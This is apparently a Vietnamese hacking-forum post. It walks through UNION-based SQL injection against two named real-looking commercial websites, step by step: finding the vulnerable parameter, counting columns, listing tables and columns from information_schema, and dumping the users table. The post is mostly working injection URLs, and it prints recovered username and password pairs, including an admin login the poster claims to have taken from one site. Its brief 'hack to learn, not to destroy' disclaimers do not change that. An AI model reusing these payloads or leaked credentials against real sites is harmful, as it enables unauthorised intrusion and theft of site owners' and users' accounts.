share anh em 1 site đã đc chiếm

http://www.dibiuk.com/product_details.php?product_id=-12 UNION SELECT 1,2,3,4,5,6,7,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--

- Em vui lòng chỉ dẫn cách thức hack để mọi người thưởng thức.
- Thấy trang thầy Tặng hôm bị tấn công, admin nghi rằng kẻ tấn công lợi dụng lỗi mã nguồn của cbox, từ đó đưa 1 hình ảnh có chứa mã nguồn độc vào............ tấn công. Không biết có phải như vậy không, ai biết phân tích coi??

http://www.dibiuk.com/product_details.php?product_id=-12 "id=-12" là lỗi mà em tìm đc = cách thử.

Sau đây em xin lấy 1 VD để giải cho Admin và các Mem cùng hiểu và thực hành ngay trên vd của em. Em xin phép dùng từ "Ta" để nói chung

VD: web "http://www.whamster.com/viewProduct.php?ID=485"có "id=485" thử "id=485' " nó hiện ra thế này "Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/sites/whamster.com/public_html/viewProduct.php" vậy là dính lỗi.
+ Ta dựa vào lỗi đó tìm Order như sau:
"http://www.whamster.com/viewProduct.php?ID=485 oder by 1-- -" (tùy chọn order by ??-- -)

ta phát hiện đc 28 cột và số cột lỗi nằm ở vị trí 18-14. Chọn đại 1 trong 2 số đó. Ta chọn số 14.
+ Tìm version trước:"http://www.whamster.com/viewProduct.php?ID=-485 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -"
Version tìm đc: 5.1.56

+ Ta tìm tiếp theo là database:"http://www.whamster.com/viewProduct.php?ID=-485 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(table_name),15,16,17,18,19,20,21,22,23,24,25,26,27,28 from information_schema.tables where table_schema=database()-- -

Khi Enter bước này Site sẽ xuất ra các USERS. Nhìu quá chọn đại đi há users vậy

+ Tiếp theo ta tìm Column như sau:
"http://www.whamster.com/viewProduct.php?ID=-485 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(column_name),15,16,17,18,19,20,21,22,23,24,25,26,27,28 from information_schema.columns where table_name=0x7573657273-- -". Như đã nói trên ta Down hackbar addon từ gu gồ nhé."0xusers = 0x7573657273".Bôi đen users ở dòng 0xusers chọn trên thanh hackbar Encoding->Hex Encoding->String to 00ff00ff

Khi Enter xong bước này thì ta có đc CSDL như sau:"ID,Username,Password,Level,Author,Email"

+ Ta chọn "Username,Password"
"http://www.whamster.com/viewProduct.php?ID=-485 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(Username,0x7c,Password),15,16,17,18,19,20,21,22,23,24,25,26,27,28 from users-- -"
Lấy users nào thì trả về from đúng như thế

+ Cuối cùng kết quả ta thu đc là: steveb|Whamskiff49
Đây là ví dụ nhé. Tài khoản đó đã bị đổi Pass rồi.
Hack để học hỏi chứ ko nên phá nhé

Nếu trình bày thế mọi người k hiểu thì cứ hỏi nhé.

Trong lúc trình bày còn nhiều thiếu sót k lường trước đc nên MOD mong các Mem và Admin thứ lỗi và bổ sung cho MOD nhé. Rất cám ơn sự ủng hộ của Admin và các Mem

Còn bây giờ hãy lao vào thực hành cho thuần thục nhé. Đó là những chiêu cơ bản thôi.

Mem nào mún học thì hãy vào http://mumauden.com/for@m@/. Trong đó sẽ có nhìu đàn anh đàn chị có Topic dạy cho Newbie đó. Cố lên nhé. Học hack ko phải để quậy mà để học hỏi và tìm hiểu thôi.

http://www.dibiuk.com/product_details.php?product_id=-12 UNION SELECT 1,2,3,4,5,6,7,group_concat(user_name,0x7c,user_password),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from cycleshopnew_admin-- -

ID: Admin
Pass: limlom72